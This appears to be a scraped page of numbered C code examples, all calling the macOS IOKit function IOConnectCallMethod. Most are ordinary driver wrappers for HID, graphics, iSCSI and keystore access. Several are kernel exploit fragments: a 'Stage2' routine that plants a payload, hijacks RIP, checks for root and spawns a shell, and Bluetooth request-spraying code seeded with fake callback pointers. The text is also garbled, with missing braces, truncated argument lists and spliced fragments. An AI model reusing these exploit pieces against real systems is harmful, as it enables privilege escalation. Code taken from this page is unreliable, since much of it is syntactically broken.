void enkript_prologue(void)
  if (IOConnectCallMethod == NULL) die("IOConnectCallMethod unavailable, require version >= 10.5");
  /* get iterator to browse drivers of the chosen class
  io_iterator_t iterator;
  if (IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("com_enkript_driver_Service"), &iterator) != KERN_SUCCESS) die("IOServiceGetMatchingServices failed");
  /* browse drivers
  for (io_service_t service = IOIteratorNext(iterator); service != IO_OBJECT_NULL; service = IOIteratorNext(iterator))
    debug("com_enkript_driver_Service instance found!");
    /* open service
    io_connect_t connect = IO_OBJECT_NULL;
    if (IOServiceOpen(service, mach_task_self(), 0, &connect) != KERN_SUCCESS) die("IOServiceOpen failed");
    /* call driver's open method
    if (IOConnectCallMethod(connect, 0 /* open, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
    /* call driver's hello method
    uint64_t buf = getpid();
    if (IOConnectCallMethod(connect, 2 /* hello, TOFIX */, &buf, 1, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
    /* call driver's close method
    if (IOConnectCallMethod(connect, 1 /* close, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
    /* close service
    if (IOServiceClose(connect) != KERN_SUCCESS) die("IOServiceClose failed");
/*! Receives data over a kernel socket associated with iSCSI.
 *  @param sessionId the qualifier part of the ISID (see RFC3720).
 *  @param connectionId the connection associated with the session.
 *  @param bhs the basic header segment received over the connection.
 *  @param data the data segment of the PDU received over the connection.
 *  @param length the length of the data block received.
 *  @return error code indicating result of operation. */
errno_t iSCSIKernelRecv(SID sessionId,
                        CID connectionId,
                        iSCSIPDUTargetBHS * bhs,
                        void ** data,
                        size_t * length)
    // Check parameters
    if(sessionId == kiSCSIInvalidSessionId || connectionId == kiSCSIInvalidConnectionId || !bhs)
        return EINVAL;
    // Setup input scalar array
    const UInt32 inputCnt = 2;
    UInt64 inputs[] = {sessionId,connectionId};
    size_t bhsLength = sizeof(iSCSIPDUTargetBHS);

    // Call kernel method to determine how much data there is to receive
    // The inputs are the sesssion qualifier and connection ID
    // The output is the size of the buffer we need to allocate to hold the data
    kern_return_t result;
    result = IOConnectCallMethod(connection,kiSCSIRecvBHS,inputs,inputCnt,NULL,0,
    if(result != kIOReturnSuccess)
        return IOReturnToErrno(result);
    // Determine how much data to allocate for the data buffer
    *length = iSCSIPDUGetDataSegmentLength((iSCSIPDUCommonBHS *)bhs);
    // If no data, were done at this point
    if(*length == 0)
        return 0;
    *data = iSCSIPDUDataCreate(*length);
    if(*data == NULL)
        return EIO;
    // Call kernel method to get data from a receive buffer
    result = IOConnectCallMethod(connection,kiSCSIRecvData,inputs,inputCnt,NULL,0,

    // If we failed, free the temporary buffer and quit with error
    if(result != kIOReturnSuccess)
    return IOReturnToErrno(result);
/* Flush surface to visible region */
IOReturn IOAccelFlushSurfaceOnFramebuffers( IOAccelConnect connect, IOOptionBits options, UInt32 framebufferMask )
        uint64_t inData[] = { framebufferMask, options };
        return IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceFlush,
                               inData, arrayCnt(inData), NULL, 0,// input
                                NULL, NULL, NULL, NULL);         // output
IOReturn IOAccelWriteUnlockSurfaceWithOptions( IOAccelConnect connect, IOOptionBits options )
        uint64_t inData = options;
        return IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceWriteUnlockOptions,
                               &inData, 1, NULL, 0,     // input
                               NULL, NULL, NULL, NULL); // output
static io_connect_t connect_to_keystore(void)
    io_registry_entry_t apple_key_bag_service;
    kern_return_t result;
    io_connect_t keystore = MACH_PORT_NULL;

    apple_key_bag_service = IOServiceGetMatchingService(kIOMasterPortDefault,

    if (apple_key_bag_service == IO_OBJECT_NULL) {
        fprintf(stderr, "Failed to get service.\n");
        return keystore;

    result = IOServiceOpen(apple_key_bag_service, mach_task_self(), 0, &keystore);
    if (KERN_SUCCESS != result)
        fprintf(stderr, "Failed to open keystore\n");

    if (keystore != MACH_PORT_NULL) {
        IOReturn kernResult = IOConnectCallMethod(keystore,
                                                  kAppleKeyStoreUserClientOpen, NULL, 0, NULL, 0, NULL, NULL,
                                                  NULL, NULL);
        if (kernResult) {
            fprintf(stderr, "Failed to open AppleKeyStore: %x\n", kernResult);
	return keystore;
  mach_port_t  connection,    // In
  uint32_t   selector,    // In
  /*const*/ uint64_t  *input,     // In
  uint32_t   inputCnt,    // In
  /*const*/ void  *inputStruct,   // In
  size_t     inputStructCnt,  // In
  uint64_t  *output,    // Out
  uint32_t  *outputCnt,   // In/Out
  void    *outputStruct,    // Out
  size_t    *outputStructCntP)  // In/Out
  kern_return_t ret = 0;  

  ret = IOConnectCallMethod(

  return ret;
Exemple #7
// logging metadata, contains e.g. size of log1, pointer to current entry etc.
// 0xc == AGCDebug
static BOOL dumpLog0(io_connect_t connect) {
    kern_return_t kernResult;
    uint8_t buffer[0x100];
    uint64_t scalarI_64[2] = { (uint64_t) buffer, 0x100 };
    kernResult = IOConnectCallMethod(connect,       // an io_connect_t returned from IOServiceOpen().
                                       kGetAGCData,  // selector of the function to be called via the user client.
                                       scalarI_64,    // array of scalar (64-bit) input values.
                                       2,             // the number of scalar input values.
                                       NULL,          // a pointer to the struct input parameter.
                                       0,             // the size of the input structure parameter.
                                       NULL,          // array of scalar (64-bit) output values.
                                       NULL,          // pointer to the number of scalar output values.
                                       NULL,           // pointer to the struct output parameter.
                                       NULL // pointer to the size of the output structure parameter.
    if (kernResult == KERN_SUCCESS) {
        printf("getMuxState was successful.\n");
        int i;
        for (i=0; i < 0x100; i++) {
            printf("0x%x: 0x%x\n", i, buffer[i]);
    } else {
        printf("getMuxState returned 0x%08x.\n", kernResult);
    return kernResult == KERN_SUCCESS;
Exemple #8
void create_requests(io_connect_t port)
  struct BluetoothCall a;
  uint32_t i;
  kern_return_t kr;

  for (i = 0; i < 7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;

  /* DispatchHCIRequestCreate() */
  a.index = 0x0;

  *(uint64_t *)a.args[0] = 5*1000;  /* Timeout */
  memset((void *)a.args[1], 0x81, 0x1000);
  memset((void *)a.args[2], 0x82, 0x1000);
  memset((void *)a.args[3], 0x83, 0x1000);
  memset((void *)a.args[4], 0x84, 0x1000);
  memset((void *)a.args[5], 0x85, 0x1000);
  memset((void *)a.args[6], 0x86, 0x1000);

  for(i = 0; i < 500; i++) {
    kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			     (uint32_t) 0,       /* Selector */
			     NULL, 0,            /* input, inputCnt */
			     (const void*) &a,   /* inputStruct */
			     120,                /* inputStructCnt */
			     NULL, NULL, NULL, NULL); /* Output stuff */

    if(kr == 0xe00002bd) /* Full */
/*! Gets an array of connection identifiers for each session.
 *  @param sessionId session identifier.
 *  @param connectionIds an array of connection identifiers for the session.
 *  @param connectionCount number of connection identifiers.
 *  @return error code indicating result of operation. */
errno_t iSCSIKernelGetConnectionIds(SID sessionId,
                                    CID * connectionIds,
                                    UInt32 * connectionCount)
    if(sessionId == kiSCSIInvalidSessionId || !connectionIds || !connectionCount)
        return EINVAL;
    const UInt32 inputCnt = 1;
    UInt64 input = sessionId;
    const UInt32 expOutputCnt = 1;
    UInt64 output;
    UInt32 outputCnt = expOutputCnt;
    *connectionCount = 0;
    size_t outputStructSize = sizeof(CID)*kiSCSIMaxConnectionsPerSession;

    kern_return_t result =
    if(result == kIOReturnSuccess && outputCnt == expOutputCnt)
        *connectionCount = (UInt32)output;
    return IOReturnToErrno(result);
Exemple #10
kcm_create_key(krb5_uuid uuid)
    io_connect_t conn;
    createKeyGetUUID_InStruct_t createKey;
    kern_return_t kr;
    uuid_OutStruct_t key;
    size_t outputStructSize = sizeof(key);

    conn = openiodev();
    if (conn == IO_OBJECT_NULL)
	return EINVAL;
    createKey.keySizeInBytes = V1_KEYSIZE;
    createKey.algorithm = fDE_ALG_AESXTS;
    memset(&key, 0, sizeof(key));
    kr = IOConnectCallMethod(conn, kAppleFDEKeyStore_createKeyGetUUID,
			     NULL, 0,
			     &createKey, sizeof(createKey),
			     NULL, 0,
			     &key, &outputStructSize);
    if (kr != KERN_SUCCESS)
	return EINVAL;
    memcpy(uuid, key.uuid, sizeof(key.uuid));
    return 0;
/*! Sends data over a kernel socket associated with iSCSI.
 *  @param sessionId the qualifier part of the ISID (see RFC3720).
 *  @param connectionId the connection associated with the session.
 *  @param bhs the basic header segment to send over the connection.
 *  @param data the data segment of the PDU to send over the connection.
 *  @param length the length of the data block to send over the connection.
 *  @return error code indicating result of operation. */
errno_t iSCSIKernelSend(SID sessionId,
                        CID connectionId,
                        iSCSIPDUInitiatorBHS * bhs,
                        void * data,
                        size_t length)
    // Check parameters
    if(sessionId    == kiSCSIInvalidSessionId || connectionId == kiSCSIInvalidConnectionId || !bhs || (!data && length > 0))
        return EINVAL;
    // Setup input scalar array
    const UInt32 inputCnt = 2;
    const UInt64 inputs[] = {sessionId, connectionId};
    // Call kernel method to send (buffer) bhs and then data
    kern_return_t result;
    result = IOConnectCallStructMethod(connection,kiSCSISendBHS,bhs,
    if(result != kIOReturnSuccess)
        return IOReturnToErrno(result);
    return IOReturnToErrno(IOConnectCallMethod(connection,kiSCSISendData,inputs,inputCnt,
/*! Looks up the connection identifier associated with a particular portal address.
 *  @param sessionId the session identifier.
 *  @param portalAddress the address passed to iSCSIKernelCreateSession() or
 *  iSCSIKernelCreateConnection() when the connection was created.
 *  @return the associated connection identifier. */
CID iSCSIKernelGetConnectionIdForPortalAddress(SID sessionId,
                                               CFStringRef portalAddress)
    if(sessionId == kiSCSIInvalidSessionId || !portalAddress)
        return EINVAL;
    const UInt32 inputCnt = 1;
    UInt64 input = sessionId;
    const UInt32 expOutputCnt = 1;
    UInt64 output[expOutputCnt];
    UInt32 outputCnt = expOutputCnt;
    kern_return_t result =
    if(result != kIOReturnSuccess || outputCnt != expOutputCnt)
        return kiSCSIInvalidConnectionId;
    return (CID)output[0];
Exemple #13
void test_io_connect_method(io_connect_t conn, int selector, uint64_t* scalar_input,
                            uint32_t scalar_input_cnt,
                            unsigned char* struct_input, size_t struct_input_cnt, int scalar_output_cnt,
                            int struct_output_cnt) {

    uint64_t outputScalar[16];
    uint32_t outputScalarCnt = scalar_output_cnt;
    char outputStruct[4096];
    size_t outputStructCnt = struct_output_cnt;
    int index = selector;
    printf("IOConnectCall (selector = %d)\n", index);
    kern_return_t err = IOConnectCallMethod(
    if (err != KERN_SUCCESS){
        printf("IOConnectCall (%d) error: %x\n", index, err);
Exemple #14
static BOOL dumpLog1(io_connect_t connect) {
    kern_return_t kernResult;
    uint8_t buffer[LOGSIZE];
    uint64_t scalarI_64[2] = { (uint64_t) buffer, LOGSIZE };
    kernResult = IOConnectCallMethod(connect,       // an io_connect_t returned from IOServiceOpen().
                                       kGetAGCData_log1,  // selector of the function to be called via the user client.
                                       scalarI_64,    // array of scalar (64-bit) input values.
                                       2,             // the number of scalar input values.
                                       NULL,          // a pointer to the struct input parameter.
                                       0,             // the size of the input structure parameter.
                                       NULL,          // array of scalar (64-bit) output values.
                                       NULL,          // pointer to the number of scalar output values.
                                       NULL,           // pointer to the struct output parameter.
                                       NULL // pointer to the size of the output structure parameter.
    if (kernResult == KERN_SUCCESS) {
        printf("getMuxState was successful.\n");
        FILE *logfile;
        logfile = fopen("log.bin", "wb");
        if (!logfile) {
            printf("cannot open file\n");
        } else {
            fwrite(buffer, sizeof(uint8_t), LOGSIZE, logfile);

    } else {
        printf("getMuxState returned 0x%08x.\n", kernResult);
    return kernResult == KERN_SUCCESS;
Exemple #15
IOHIDSetCursorEnable( io_connect_t connect,
	boolean_t enable )
    uint64_t inData = enable;
    return IOConnectCallMethod( connect, 2,		// Index
			   &inData, 1, NULL, 0,		// Input
			   NULL, NULL, NULL, NULL);	// Output
Exemple #16
int Stage2(void)
    int         i;
    unsigned    char        *p;
    unsigned    char        *p_ptr;
    kern_return_t           k_error;

    char                    UselessStruct[4096];
    size_t                  UselessStructSize = 0x14; 
    p                   = (unsigned char*)mem; 
    p_ptr               = p + OFFSET_ROOM;
    printf("Stage2: preparing the stage2 payload \n");

    unsigned char *t                            =   (unsigned char*)&stage2;
    *(uint64_t*)(t + OFF_API_CURRENT_PROC)      =   api_current_proc;
    *(uint64_t*)(t + OFF_API_PROC_UCRED)        =   api_proc_ucred;
    *(uint64_t*)(t + OFF_API_POSIX_CRED_GET)    =   api_posix_cred_get;
    *(uint64_t*)(t + OFF_API_CHGPROCCNT)        =   api_chgproccnt;
    printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
    memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2));

    printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
    printf("Stage2: Copying trigger data \n");
    *(uint64_t*)p_ptr    =   INIT_SIG;
    printf("Stage2: Making stage2 call\n");    
    k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize); 
    if (getuid() == 0) 
        printf("Stage2: success, got root! \n");
        printf("Stage2: now executing shell \n");
    printf("Stage2: failed! \n");
    return -1;    

Exemple #17
extern kern_return_t
IOHIDSetCursorBounds( io_connect_t connect, const IOGBounds * bounds )
	if ( !bounds )
		return kIOReturnBadArgument;

	return IOConnectCallMethod(connect, 6,			// Index
			NULL, 0,    bounds, sizeof(*bounds),	// Input,
			NULL, NULL, NULL,   NULL);				// Output
IOReturn IOAccelReadSurface( IOAccelConnect connect, IOAccelSurfaceReadData * parameters )
        IOReturn result;
        result = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceRead,
               NULL, 0, parameters, sizeof( IOAccelSurfaceReadData), // input
               NULL, NULL, NULL, NULL); // no output

        return result;
Exemple #19
uint64_t map_user_memory(mach_port_t conn) {
  kern_return_t err;
  void* mem = malloc(0x20000);
  // make sure that the address we pass is page-aligned:
  mem = (void*) ((((uint64_t)mem)+0x1000)&~0xfff);
  printf("trying to map user pointer: %p\n", mem);
  uint64_t inputScalar[16] = {0};  
  uint64_t inputScalarCnt = 0;

  char inputStruct[4096] = {0};
  size_t inputStructCnt = 0;

  uint64_t outputScalar[16] = {0};
  uint32_t outputScalarCnt = 0;

  char outputStruct[4096] = {0};
  size_t outputStructCnt = 0;

  inputScalarCnt = 0;
  inputStructCnt = 0x10;

  outputScalarCnt = 4096;
  outputStructCnt = 16;

  struct mem_desc* md = (struct mem_desc*)inputStruct;
  md->ptr = (uint64_t)mem;
  md->size = 0x1000;

  err = IOConnectCallMethod(
   0x200, // IGAccelGLContext::map_user_memory

  if (err != KERN_SUCCESS){
   printf("IOConnectCall error: %x\n", err);
   //return 0;
  } else{
    printf("worked? outputScalarCnt = %d\n", outputScalarCnt);
  printf("outputScalarCnt = %d\n", outputScalarCnt);

  md = (struct mem_desc*)outputStruct;
  printf("0x%llx :: 0x%llx\n", md->ptr, md->size);

  return (uint64_t)mem;
Exemple #20
IOHIDSetFixedMouseLocation( io_connect_t connect, int32_t x, int32_t y )
    int32_t     data[3] = {x, y, 0};
    data[2] = getpid();
    return IOConnectCallMethod(connect, 4,                      // Index
                               NULL, 0,    data, sizeof(data),  // Input
                               NULL, NULL, NULL, NULL);         // Output
Exemple #21
static void
closeiodev(io_connect_t conn)
    kern_return_t kr;

    kr = IOConnectCallMethod(conn, kAppleFDEKeyStoreUserClientClose, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL);
    if (kr != KERN_SUCCESS)

Exemple #22
IOHIDPostEvent( io_connect_t        connect,
                UInt32              eventType,
                IOGPoint            location,
                const NXEventData * eventData,
                UInt32              eventDataVersion,
                IOOptionBits        eventFlags,
                IOOptionBits        options )
    int *               eventPid = 0;
    size_t              dataSize = sizeof(struct evioLLEvent) + sizeof(int);
    char                data[dataSize];
    struct evioLLEvent* event;
    UInt32              eventDataSize = sizeof(NXEventData);

    bzero(data, dataSize);
    event = (struct evioLLEvent*)data;
    event->type      = eventType;
    event->location  = location;
    event->flags     = eventFlags;
    event->setFlags  = options;
    event->setCursor = options & (kIOHIDSetCursorPosition | kIOHIDSetRelativeCursorPosition);
    eventPid = (int *)(event + 1);
    *eventPid = getpid();

    if ( eventDataVersion < 2 )
        // Support calls from legacy IOHIDPostEvent clients.
        // 1. NXEventData was 32 bytes long.
        // 2. eventDataVersion was (boolean_t) setCursor
        eventDataSize   = 32;
        event->setCursor = eventDataVersion; // 0 or 1

    if ( eventDataSize < sizeof(event->data) )
        bcopy( eventData, &(event->data), eventDataSize );
        bzero( ((UInt8 *)(&(event->data))) + eventDataSize,
               sizeof(event->data) - eventDataSize );
        bcopy( eventData, &event->data, sizeof(event->data) );

    // Let PM log the software HID events

    return IOConnectCallMethod(connect, 3,		// Index
			   NULL, 0,    data, dataSize,	// Input
			   NULL, NULL, NULL, NULL);	// Output
static CFDataRef create_keybag(keybag_handle_t bag_type, CFDataRef password)
    uint64_t inputs[] = { bag_type };
    uint64_t outputs[] = {0};
    uint32_t num_inputs = array_size(inputs);
    uint32_t num_outputs = array_size(outputs);
    IOReturn kernResult;

    io_connect_t keystore;

    unsigned char keybagdata[4096]; //Is that big enough?
	size_t keybagsize=sizeof(keybagdata);


    kernResult = IOConnectCallMethod(keystore,
                                     inputs, num_inputs, NULL, 0,
                                     outputs, &num_outputs, NULL, 0);

    if (kernResult) {
        fprintf(stderr, "kAppleKeyStoreKeyBagCreate: 0x%x\n", kernResult);
        return NULL;

    /* Copy out keybag */

    kernResult = IOConnectCallMethod(keystore,
                                     inputs, num_inputs, NULL, 0,
                                     NULL, 0, keybagdata, &keybagsize);

    if (kernResult) {
        fprintf(stderr, "kAppleKeyStoreKeyBagCopy: 0x%x\n", kernResult);
        return NULL;

    return CFDataCreate(kCFAllocatorDefault, keybagdata, keybagsize);
Exemple #24
void create_requests(io_connect_t port)
  BluetoothCall a;
  BluetoothHCIRequestCallbackInfo cb;
  uint32_t i;
  kern_return_t kr;

  for (i=0; i<7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;

  /* DispatchHCIRequestCreate() */
  a.index = 0x0;

  *(uint64_t *)a.args[0] = 5432;	    /* Timeout */
  *(uint64_t *)a.args[1] = 1;               /* DoAsyncNotify */

  cb.userCallback   = (uint64_t *)0x4141414141414141;
  cb.userRefCon     = (uint64_t *)0x4242424242424242;
  cb.internalRefCon = (uint64_t *)0x4343434343434343;
  cb.asyncIDRefCon  = (uint64_t *)0x4444444444444444;
  cb.reserved       = (uint64_t *)0x4545454545454545;

  a.args[2] = (uint64_t)&cb;               /* CallbackInfo */
  a.sizes[2] = sizeof(cb);

  *(uint64_t *)a.args[3] = 0;               /* This appears to be ignored */
  *(uint64_t *)a.args[4] = 0;               /* outRequestId (no real need to
					       set it, just a reminder */

#ifdef DEBUG
  for(i = 0; i<120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);

  for(i = 0; i < 500; i++) {
    kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			     (uint32_t) 0,       /* Selector */
			     NULL, 0,            /* input, inputCnt */
			     (const void*) &a,   /* inputStruct */
			     120,                /* inputStructCnt */
			     NULL, NULL, NULL, NULL); /* Output stuff */

    /* Max number of requests reached */
    if(kr == 0xe00002bd)
  printf(" [+] Created %d requests!\n", i);
Exemple #25
extern kern_return_t
IOHIDSetOnScreenCursorBounds( io_connect_t connect, const IOGPoint * point, const IOGBounds * bounds )
    if ( !bounds || !point )
        return kIOReturnBadArgument;
    int16_t   data[6] = {point->x, point->y, bounds->minx, bounds->miny, bounds->maxx, bounds->maxy};
    return IOConnectCallMethod(connect, 12,			// Index
                               NULL, 0,    data, sizeof(data),	// Input,
                               NULL, NULL, NULL,   NULL);				// Output
IOReturn IOAccelWriteLockSurfaceWithOptions( IOAccelConnect connect, IOOptionBits options,
                                             IOAccelSurfaceInformation * info, UInt32 infoSize )
        uint64_t inData = options;
        size_t size = (size_t) infoSize;
        IOReturn ret =  IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceWriteLockOptions,
                                        &inData, 1,             // in scalar
                                        NULL,    0,             // in struct
                                        NULL,    NULL,          // out scalar
                                        info,    &size);        // out struct
        return ret;
Exemple #27
IOHIDCreateSharedMemory( io_connect_t connect,
	unsigned int version )
    uint64_t inData = version;
    return IOConnectCallMethod( connect, 0,		// Index
			   &inData, 1, NULL, 0,		// Input
			   NULL, NULL, NULL, NULL);	// Output
IOReturn IOAccelSetSurfaceFramebufferShape( IOAccelConnect connect, IOAccelDeviceRegion *rgn,
                                            eIOAccelSurfaceShapeBits options, UInt32 framebufferIndex )
        uint64_t inData[] = { options, framebufferIndex };
        IOReturn result;
        size_t   rgnSize = regionSize(rgn);

        result = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceSetShape,
                                inData, arrayCnt(inData), rgn, rgnSize,
                                NULL, NULL, NULL, NULL); // no output
        return result;
Exemple #29
void make_iokit_call(){  
Exemple #30
IOHIDSetVirtualDisplayBounds( io_connect_t handle, UInt32 display_token, const IOGBounds * bounds )
    kern_return_t err;
    uint64_t        inData[5] = {display_token, bounds->minx, bounds->maxx, bounds->miny, bounds->maxy};
    uint32_t        outCount = 0;
    err = IOConnectCallMethod(handle, 9,      // Index
                              inData, 5, NULL, 0,    // Input
                              NULL, &outCount, NULL, NULL); // Output
    return err;